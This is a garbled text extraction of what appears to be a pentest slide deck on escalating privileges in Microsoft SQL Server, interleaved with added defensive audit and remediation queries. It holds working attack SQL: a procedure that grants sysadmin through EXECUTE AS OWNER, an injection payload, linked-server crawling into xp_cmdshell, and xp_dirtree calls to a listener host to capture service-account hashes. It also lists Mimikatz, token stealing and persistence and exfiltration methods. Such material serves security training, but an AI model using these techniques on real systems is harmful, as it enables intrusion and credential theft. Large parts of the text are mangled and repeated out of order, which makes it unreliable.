Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges: Impersonation - Stored Procedure and Trigger Creation/Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
• DB_OWNER role can impersonate the actual database owner, and SYSADMIN is often the OWNER

USE MyAppDb
GO
-- Created by a db_owner member; runs as the database owner (here a sysadmin)
-- and succeeds when MyAppDb is marked TRUSTWORTHY
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser', 'sysadmin'
GO
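An audit query for the conditions the slide relies on, as an added example (not from the deck or from PowerUpSQL): it lists every user database marked TRUSTWORTHY, whether its owner is a sysadmin, who is in db_owner there, and every module declared WITH EXECUTE AS. Nothing about the target instance is assumed; run it as a login that can read each database's catalog. The database and login names in the commented remediation are placeholders.

```sql
-- Added example, not from the original deck: find TRUSTWORTHY databases with a sysadmin
-- owner, their db_owner members, and modules that run under EXECUTE AS.
DECLARE @sql NVARCHAR(MAX) = N'';

-- 1. TRUSTWORTHY user databases and their owners (msdb is trustworthy by design, skip it)
SELECT d.name                                                  AS database_name,
       SUSER_SNAME(d.owner_sid)                                AS owner_login,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid))  AS owner_is_sysadmin
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1 AND d.database_id > 4;

-- 2. For each of those databases: db_owner members and EXECUTE AS modules.
--    sys.sql_modules.execute_as_principal_id: NULL = CALLER, -2 = OWNER, else a user id.
SELECT @sql += N'
SELECT ' + QUOTENAME(d.name, '''') + N' AS database_name, ''db_owner member'' AS finding,
       u.name AS detail
FROM ' + QUOTENAME(d.name) + N'.sys.database_role_members AS rm
JOIN ' + QUOTENAME(d.name) + N'.sys.database_principals AS r ON r.principal_id = rm.role_principal_id
JOIN ' + QUOTENAME(d.name) + N'.sys.database_principals AS u ON u.principal_id = rm.member_principal_id
WHERE r.name = ''db_owner''
UNION ALL
SELECT ' + QUOTENAME(d.name, '''') + N', ''EXECUTE AS '' +
       CASE m.execute_as_principal_id WHEN -2 THEN ''OWNER'' ELSE p.name END,
       o.type_desc + '' '' + o.name
FROM ' + QUOTENAME(d.name) + N'.sys.sql_modules AS m
JOIN ' + QUOTENAME(d.name) + N'.sys.objects AS o ON o.object_id = m.object_id
LEFT JOIN ' + QUOTENAME(d.name) + N'.sys.database_principals AS p
       ON p.principal_id = m.execute_as_principal_id
WHERE m.execute_as_principal_id IS NOT NULL;'
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1 AND d.database_id > 4 AND d.state_desc = 'ONLINE';

EXEC sp_executesql @sql;

-- Remediation once the findings are understood (placeholder names):
-- ALTER DATABASE [MyAppDb] SET TRUSTWORTHY OFF;
-- ALTER AUTHORIZATION ON DATABASE::[MyAppDb] TO [LowPrivOwnerLogin];
```

A database that is TRUSTWORTHY, owned by a sysadmin, and has application users in db_owner is exactly the setup sp_escalate_me needs; any one of the three conditions removed breaks the chain.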
Escalating Privileges: Impersonation - Stored Procedure and Trigger Creation/Injection Issues
• Use signed procedures
  o Create stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure login privileges
  o Sign stored procedure with certificate
  o GRANT EXECUTE to user
Pros:
• Can execute queries/commands in another user's context
• Limits commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as TRUSTWORTHY for OS command execution
Cons:
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
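The seven steps above carried through end to end, as an added example (this is not code from the deck or from PowerUpSQL). The procedure lists active sessions, which needs VIEW SERVER STATE, a server-level right the application user does not hold; the signature supplies exactly that right and nothing else. Database, user, procedure, certificate and login names (MyAppDb, MyAppUser, usp_active_sessions, ProcSigningCert, ProcSigningLogin) and the master key password are placeholders. CERTENCODED and CREATE CERTIFICATE ... FROM BINARY require SQL Server 2012 or later; on older versions use BACKUP CERTIFICATE to a file instead.

```sql
-- Added example, not from the original deck: certificate-signed procedure instead of
-- WITH EXECUTE AS OWNER. All names and the password are placeholders.
USE MyAppDb;
GO
-- 1. The procedure. No EXECUTE AS clause, and MyAppDb does not need TRUSTWORTHY.
CREATE PROCEDURE dbo.usp_active_sessions
AS
BEGIN
    SET NOCOUNT ON;
    SELECT session_id, login_name, host_name, program_name
    FROM sys.dm_exec_sessions           -- requires VIEW SERVER STATE
    WHERE is_user_process = 1;
END
GO
-- 2. Database master key (needed before a certificate with a private key can be created)
CREATE MASTER KEY ENCRYPTION BY PASSWORD = 'ChangeMe-Long-Random-Passphrase-1!';
GO
-- 3. Certificate that will sign the module; its private key stays in MyAppDb
CREATE CERTIFICATE ProcSigningCert WITH SUBJECT = 'Signs usp_active_sessions';
GO
-- 4. Copy the public part into master and create a login from it. That login can never
--    connect; it exists only to carry server-level permissions into signed modules.
DECLARE @cert VARBINARY(MAX) = CERTENCODED(CERT_ID('ProcSigningCert'));
DECLARE @sql  NVARCHAR(MAX) = N'USE master;
CREATE CERTIFICATE ProcSigningCert FROM BINARY = ' + CONVERT(NVARCHAR(MAX), @cert, 1) + N';
CREATE LOGIN ProcSigningLogin FROM CERTIFICATE ProcSigningCert;';
EXEC (@sql);
GO
-- 5. Grant the login the one right the procedure needs
USE master;
GRANT VIEW SERVER STATE TO ProcSigningLogin;
GO
-- 6. Sign the procedure. ALTER PROCEDURE drops the signature, so re-run this after edits.
USE MyAppDb;
ADD SIGNATURE TO dbo.usp_active_sessions BY CERTIFICATE ProcSigningCert;
GO
-- 7. Let the application user run it
GRANT EXECUTE ON dbo.usp_active_sessions TO MyAppUser;
GO
-- Verification: which modules in this database currently carry a signature
SELECT OBJECT_NAME(cp.major_id) AS signed_module, cp.crypt_type_desc
FROM sys.crypt_properties AS cp;
```

Compared with the EXECUTE AS OWNER version, a db_owner member who edits this procedure gets nothing extra: the signature is removed by the edit, and the certificate login holds only VIEW SERVER STATE rather than the owner's sysadmin rights.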
Escalating Privileges: Impersonation - SQL Injection Example

CREATE PROCEDURE sp_sqli2
    @DbName varchar(max)
AS
BEGIN
    DECLARE @query AS varchar(max)
    -- @DbName is concatenated straight into the statement text
    SET @query = 'SELECT name FROM master..sysdatabases WHERE name LIKE ''%' + @DbName + '%'' OR name = ''tempdb'''
    EXECUTE(@query)
END
GO
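Exercising sp_sqli2 and then closing the hole, as an added example (not code from the deck or from PowerUpSQL). It assumes the procedure exists in the current database with the definition shown above; the payload strings are constructed for illustration, and MyAppUser is a placeholder login name.

```sql
-- Added example, not from the original deck: injection into sp_sqli2 and a safe rewrite.
-- Normal use
EXEC sp_sqli2 'master';

-- Injected call. The parameter closes the LIKE literal and appends its own statement;
-- the text sp_sqli2 actually executes is:
--   SELECT name FROM master..sysdatabases WHERE name LIKE '%x' UNION SELECT name
--   FROM master..syslogins --%' OR name='tempdb'
EXEC sp_sqli2 'x'' UNION SELECT name FROM master..syslogins --';

-- If the procedure were also declared WITH EXECUTE AS OWNER in a TRUSTWORTHY database
-- whose owner is a sysadmin (the scenario of this section), the same hole runs the
-- owner's rights, e.g.:
-- EXEC sp_sqli2 'x'';EXEC sp_addsrvrolemember ''MyAppUser'',''sysadmin''--';

-- Fixed version: the value is bound as a parameter of sp_executesql and never becomes
-- part of the statement text. sysname caps the length; % and _ still act as LIKE
-- wildcards, which is a matching quirk, not an injection.
CREATE PROCEDURE sp_sqli2_fixed
    @DbName sysname
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @query NVARCHAR(MAX) =
        N'SELECT name FROM master.sys.databases
          WHERE name LIKE ''%'' + @pattern + ''%'' OR name = N''tempdb''';
    EXEC sp_executesql @query, N'@pattern sysname', @pattern = @DbName;
END
GO

-- Same payload against the fixed procedure returns nothing: no database has that name.
EXEC sp_sqli2_fixed 'x'' UNION SELECT name FROM master..syslogins --';
```

The dynamic SQL in the fixed version is only kept to show sp_executesql; for this particular query a plain static SELECT with @DbName in the predicate would be simpler and equally safe.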
Escalating Privileges: Shared Service Accounts - Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them
One account to rule them all.
[Figure: "Leveraging Shared MS SQL Server Service Accounts". Zones Internet / DMZ / Intranet, with web applications reachable on ports 80 and 443 and SQL Servers on ports 1433 and 1434; ADS = Active Directory, HVA = High Value Application, LVA = Low Value Application. Attack sequence: 1. SQL injection against the internet-facing LVA; 2. execute local commands via xp_cmdshell on the LVA's SQL Server; 3. access the HVA with the shared domain service account and execute commands and gather data from the other database servers via osql.]
Escalating Privileges: Crawling Server Links
Escalating Privileges: Crawling Server Links - What's a database link?
Database links (linked servers) are basically persistent database connections for SQL Servers.
Why should I care? Short answer = privilege escalation
• Public role can use links to execute queries on remote servers as whatever login the link is mapped to (impersonation)
  SELECT * FROM OPENQUERY([SQLSERVER2], 'SELECT @@Version')
• Stored procedures can be executed (xp_cmdshell); turning xp_cmdshell on over a link requires RPC Out to be enabled on that link
• Links can be crawled: a linked server that has links of its own lets you keep hopping
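A manual link crawl, as an added example (not code from the deck; PowerUpSQL's Get-SQLServerLinkCrawl automates the same walk). Link names SQLSERVER2 and SQLSERVER3 are placeholders, and nothing here alters configuration except the final, clearly marked EXEC AT.

```sql
-- Added example, not from the original deck: crawling linked servers by hand.
-- Link names are placeholders.

-- Step 1: which links exist here, and how do they authenticate?
--   local_principal_id = 0 is the default mapping that applies to every login (public);
--   uses_self_credential = 1 passes the caller through, otherwise remote_name is a fixed
--   login on the far side (often sa).
SELECT s.name AS link_name,
       s.data_source,
       s.is_rpc_out_enabled,
       CASE WHEN l.uses_self_credential = 1 THEN 'caller (pass-through)'
            ELSE COALESCE(l.remote_name, '(no mapping: access denied)') END AS remote_login
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS l
       ON l.server_id = s.server_id AND l.local_principal_id = 0
WHERE s.is_linked = 1;

-- Step 2: one hop. The query runs on SQLSERVER2 as the mapped login, so the
-- sysadmin check answers for that remote login, not for you.
SELECT * FROM OPENQUERY([SQLSERVER2],
    'SELECT @@SERVERNAME AS server, SYSTEM_USER AS remote_login,
            IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin');

-- Step 3: two hops. Each nesting level doubles the quotes of the level inside it.
SELECT * FROM OPENQUERY([SQLSERVER2],
    'SELECT * FROM OPENQUERY([SQLSERVER3],
        ''SELECT @@SERVERNAME AS server, SYSTEM_USER AS remote_login,
                 IS_SRVROLEMEMBER(''''sysadmin'''') AS is_sysadmin'')');

-- Step 4: OS commands. OPENQUERY can run xp_cmdshell if it is already enabled on the
-- remote side; enabling it needs RPC Out on the link plus sysadmin there (EXEC ... AT).
-- EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;
--        EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [SQLSERVER2];
SELECT * FROM OPENQUERY([SQLSERVER2], 'EXEC master..xp_cmdshell ''whoami''');
```

Step 1 is also the defender's query: a link whose default mapping is a fixed sysadmin login hands that login to every member of public on the local server, which is the "DB link with SA account" case in the figure below.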
[Figure: "Leveraging MS SQL Database links". Same zones, ports and key as the previous figure. DB1 (the LVA's SQL Server) holds a DB link configured with least privileges and another DB link configured with the SA account. Attack sequence: 1. SQL injection against the LVA; 2. execute SQL queries and local commands on other database servers via nested linked servers.]
Escalating Privileges: Crawling Server Links - Penetration Test Stats
Database links exist (and can be crawled) in about 50% of the environments we've seen.

Escalating Privileges: UNC Path Injection
• UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
• Almost all procedures that accept a file path in SQL Server support UNC paths
• UNC paths can be used to force the SQL Server service account to authenticate to an attacker-controlled host
• An attacker can then capture the Net-NTLM hash (the NTLM challenge/response, not the NT hash itself) and crack it offline or relay it; relay only works against targets that do not require SMB signing
• Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Oh yeah... by DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path: xp_dirtree and xp_fileexist
So in summary... the PUBLIC role can obtain the SQL Server service account's Net-NTLM hash by default.
But who really has PUBLIC role access? Oh yeah, a ton of domain users (every login is a member of public).
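The trigger a PUBLIC-role login can fire, next to the checks and the revocation a DBA would apply, as an added example (not code from the deck; Get-SQLServiceAccountPwHashes, demonstrated next, automates the attacker side with a listener). 192.168.1.4 is the address used on the slide; the share does not need to exist, since the NTLM exchange happens before the server learns that.

```sql
-- Added example, not from the original deck: UNC path injection and its audit.
-- 192.168.1.4 stands for the attacker's listener; the share need not exist.

-- Attacker side: either call makes the SQL Server service account open an SMB session
-- to the host in the path and authenticate with NTLM. Both are public by default.
EXEC master..xp_dirtree   '\\192.168.1.4\file', 1, 1;   -- (path, depth, include files)
EXEC master..xp_fileexist '\\192.168.1.4\file';

-- Defender side, 1: who holds EXECUTE on the file-path procedures in master?
-- Extended procedures are rows of type X in master.sys.objects; the default grant
-- to public shows up here as an explicit permission.
SELECT o.name AS procedure_name, dp.state_desc, dp.permission_name, pr.name AS grantee
FROM master.sys.database_permissions AS dp
JOIN master.sys.objects             AS o  ON o.object_id = dp.major_id AND dp.class = 1
JOIN master.sys.database_principals AS pr ON pr.principal_id = dp.grantee_principal_id
WHERE o.name IN ('xp_dirtree', 'xp_fileexist', 'xp_subdirs');

-- Defender side, 2: remove the default grant. Sysadmins and the service account itself
-- are unaffected; test SSMS file-browse dialogs for non-sysadmin users afterwards, as
-- they rely on xp_dirtree.
USE master;
REVOKE EXECUTE ON OBJECT::dbo.xp_dirtree   FROM public;
REVOKE EXECUTE ON OBJECT::dbo.xp_fileexist FROM public;
REVOKE EXECUTE ON OBJECT::dbo.xp_subdirs   FROM public;
```

Revoking the grant only closes the low-privilege path; any sysadmin (or any procedure that takes a file path) can still be pointed at a UNC path, so the durable fixes are SMB signing on the targets, egress filtering of SMB from database servers, and not sharing one domain service account across instances.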
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes ...what? It's self descriptive.
Escalating Privileges: OS Admin to SysAdmin
Escalating Privileges: OS Admin to SysAdmin - Two things to know...
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions give the service account sysadmin privileges: as a login directly on older versions, and from 2012 onward through the per-service SID (NT SERVICE\MSSQLSERVER or NT SERVICE\MSSQL$<instance>), which is a sysadmin, so the running process holds those rights either way

Escalating Privileges: OS Admin to SysAdmin

Approach               2000   2005   2008   2012   2014   2016
LSA Secrets             x      x      x      x      x      x
Local Administrator     x      x
LocalSystem             x      x      x
Process Migration       x      x      x      x      x      x
Token Stealing          x      x      x      x      x      x
Single User Mode               x      x      x      x      x

Below are some options for leveraging that knowledge.

Escalating Privileges: OS Admin to SysAdmin - Here are some tool options
Approach -> Common Tools
Access as Local Administrator -> Management Studio, sqlcmd, and other native SQL client tools
Access as LocalSystem -> PsExec, accessibility options, debugger, with native SQL client tools
Recover SQL Server service account password from LSA Secrets -> Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process -> Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from the SQL Server service process -> Metasploit Incognito, Invoke-TokenManipulation
Single User Mode -> DBATools
Common Post Exploitation Activities
Post Exploitation Overview: Common Post Exploitation Activities
1. Establish Persistence
   • SQL Server layer: startup procedures, agent jobs, triggers, modified code
   • OS layer: registry & file auto-runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted (TDE) databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
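The "keywords, sample, Luhn" triage from item 2 in T-SQL, as an added example (not code from the deck or from PowerUpSQL). Candidate columns are discovered from the catalog of the current database, so no schema is assumed; the keyword list and the 100-row sample size are constructed choices, and the Luhn routine is the standard mod-10 check.

```sql
-- Added example, not from the original deck: find columns whose sampled values pass
-- the Luhn check. Keyword list and sample size are constructed choices.
CREATE FUNCTION dbo.fn_luhn_valid (@digits VARCHAR(32))
RETURNS BIT
AS
BEGIN
    -- Drop common separators, then reject anything that is not 13 to 19 digits
    SET @digits = REPLACE(REPLACE(@digits, ' ', ''), '-', '');
    IF @digits IS NULL OR LEN(@digits) NOT BETWEEN 13 AND 19 OR @digits LIKE '%[^0-9]%'
        RETURN 0;
    DECLARE @sum INT = 0, @pos INT = LEN(@digits), @double BIT = 0, @d INT;
    WHILE @pos >= 1
    BEGIN
        -- Walk from the right; every second digit is doubled and folded back to one digit
        SET @d = CAST(SUBSTRING(@digits, @pos, 1) AS INT);
        IF @double = 1
        BEGIN
            SET @d = @d * 2;
            IF @d > 9 SET @d = @d - 9;
        END
        SET @sum += @d;
        SET @double = 1 - @double;
        SET @pos -= 1;
    END
    RETURN CASE WHEN @sum % 10 = 0 THEN 1 ELSE 0 END;
END
GO

-- Step 1: candidate columns by name, restricted to types that cast cleanly to text
SELECT s.name AS schema_name, t.name AS table_name, c.name AS column_name
INTO #candidates
FROM sys.columns AS c
JOIN sys.tables  AS t  ON t.object_id   = c.object_id
JOIN sys.schemas AS s  ON s.schema_id   = t.schema_id
JOIN sys.types   AS ty ON ty.user_type_id = c.user_type_id
WHERE ty.name IN ('varchar', 'nvarchar', 'char', 'nchar', 'bigint', 'decimal', 'numeric')
  AND (c.name LIKE '%card%' OR c.name LIKE '%ccn%' OR c.name LIKE '%pan%' OR c.name LIKE '%acct%');

-- Step 2: sample each candidate and count how many values pass Luhn
DECLARE @sql NVARCHAR(MAX) = N'';
SELECT @sql += N'
SELECT ' + QUOTENAME(schema_name + N'.' + table_name + N'.' + column_name, '''') + N' AS [column],
       COUNT(*) AS sampled,
       SUM(CAST(dbo.fn_luhn_valid(CAST(' + QUOTENAME(column_name) + N' AS VARCHAR(32))) AS INT)) AS luhn_valid
FROM (SELECT TOP (100) ' + QUOTENAME(column_name) + N'
      FROM ' + QUOTENAME(schema_name) + N'.' + QUOTENAME(table_name) + N'
      WHERE ' + QUOTENAME(column_name) + N' IS NOT NULL) AS sample;'
FROM #candidates;
EXEC sp_executesql @sql;
DROP TABLE #candidates;
```

A column where most sampled values pass is worth a closer look; a handful of passes is noise, since roughly one in ten random digit strings satisfies Luhn and other identifiers (IMEIs, some national ID formats) use the same check. Transparently encrypted databases, the other item on the list, are visible in sys.databases.is_encrypted and do not need sampling to find.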
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
Cons
• No granular control over the database owner's privileges
• DB_OWNER role can EXECUTE AS OWNER of the DB, which is often a sysadmin
• Requires the database to be configured as trustworthy for OS command execution
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
• DB_OWNER role can impersonate the actual database owner

USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser','sysadmin'
GO

SYSADMIN is often the OWNER
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• Use signed procedures
  o Create stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure login privileges
  o Sign stored procedure with certificate
  o GRANT EXECUTE to user
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as trustworthy for OS command execution
Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
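The seven signing steps above, carried out in T-SQL as an added example (not from the original deck or from PowerUpSQL). The procedure needs VIEW SERVER STATE, which the application user does not hold; the names dbo.usp_ActiveRequests, ProcSigningCert, ProcSigningLogin and the password placeholder are assumed, while MyAppDb and MyAppUser follow the deck. Run as a sysadmin.

```sql
USE MyAppDb;
GO
-- 1. Create the stored procedure. Its body reads a server-level DMV that
--    requires VIEW SERVER STATE, a permission the app user should not have.
CREATE PROCEDURE dbo.usp_ActiveRequests
AS
BEGIN
    SET NOCOUNT ON;
    SELECT session_id, status, command, start_time
    FROM   sys.dm_exec_requests
    WHERE  session_id > 50;
END
GO
-- 2. Create a database master key; it protects the certificate's private key.
CREATE MASTER KEY ENCRYPTION BY PASSWORD = '<strong-placeholder-password>';
GO
-- 3. Create the certificate that will carry the extra permission.
CREATE CERTIFICATE ProcSigningCert WITH SUBJECT = 'Signs dbo.usp_ActiveRequests';
GO
-- 4. Create a login from the certificate. Only the public part is copied into
--    master; the resulting login cannot connect, it exists to hold permissions.
DECLARE @pub varbinary(max) = CERTENCODED(CERT_ID('ProcSigningCert'));
DECLARE @sql nvarchar(max) = N'USE master;
    CREATE CERTIFICATE ProcSigningCert FROM BINARY = '
    + CONVERT(nvarchar(max), @pub, 1) + N';
    CREATE LOGIN ProcSigningLogin FROM CERTIFICATE ProcSigningCert;';
EXEC (@sql);
GO
-- 5. Configure login privileges: exactly what the body needs, nothing more.
--    (Compare EXECUTE AS OWNER, which hands over everything the owner holds.)
GRANT VIEW SERVER STATE TO ProcSigningLogin;
GO
-- 6. Sign the procedure. ALTERing the procedure later drops the signature,
--    so a tampered body silently loses the extra permission.
ADD SIGNATURE TO dbo.usp_ActiveRequests BY CERTIFICATE ProcSigningCert;
GO
-- 7. GRANT EXECUTE to the low-privileged application user.
GRANT EXECUTE ON dbo.usp_ActiveRequests TO MyAppUser;
GO
-- Check: the signature is in place and the database did not need TRUSTWORTHY.
SELECT OBJECT_NAME(cp.major_id) AS signed_module, c.name AS certificate_name
FROM   sys.crypt_properties cp
JOIN   sys.certificates c ON c.thumbprint = cp.thumbprint
WHERE  cp.class_desc = 'OBJECT_OR_COLUMN';
SELECT name, is_trustworthy_on FROM sys.databases WHERE name = DB_NAME();
```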
Escalating Privileges: Impersonation
SQL Injection Example

CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%' + @DbName + '%'' OR name=''tempdb'''
EXECUTE(@query)
END
GO
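sp_sqli2 concatenates @DbName into the statement text, so a single quote in the argument ends the LIKE pattern and whatever follows runs with the procedure's rights, which under EXECUTE AS OWNER are the owner's. A hardened rewrite, added here as an example and not part of the original deck, passes the value as a typed parameter of sp_executesql instead; the name sp_sqli2_safe is assumed, MyAppDb follows the deck.

```sql
USE MyAppDb;
GO
CREATE PROCEDURE sp_sqli2_safe
    @DbName nvarchar(128)
AS
BEGIN
    SET NOCOUNT ON;

    -- Escape LIKE metacharacters in the caller's value so it can only match
    -- literally (a bare '%' would otherwise list every database).
    DECLARE @pattern nvarchar(512) = @DbName;
    SET @pattern = REPLACE(@pattern, '\', '\\');
    SET @pattern = REPLACE(@pattern, '%', '\%');
    SET @pattern = REPLACE(@pattern, '_', '\_');
    SET @pattern = REPLACE(@pattern, '[', '\[');

    -- The statement text is a constant. The caller's value arrives only as a
    -- parameter, so quotes inside it are data, never syntax.
    DECLARE @sql nvarchar(max) = N'
        SELECT name
        FROM   master.sys.databases
        WHERE  name LIKE N''%'' + @pattern + N''%'' ESCAPE ''\''
           OR  name = N''tempdb'';';

    EXEC sp_executesql @sql, N'@pattern nvarchar(512)', @pattern = @pattern;
END
GO

-- The argument that breaks out of sp_sqli2 is matched as a literal string here;
-- nothing after the quote is executed.
EXEC sp_sqli2_safe @DbName = N'x'' OR 1=1 --';
GO
```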
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them
One account to rule them all
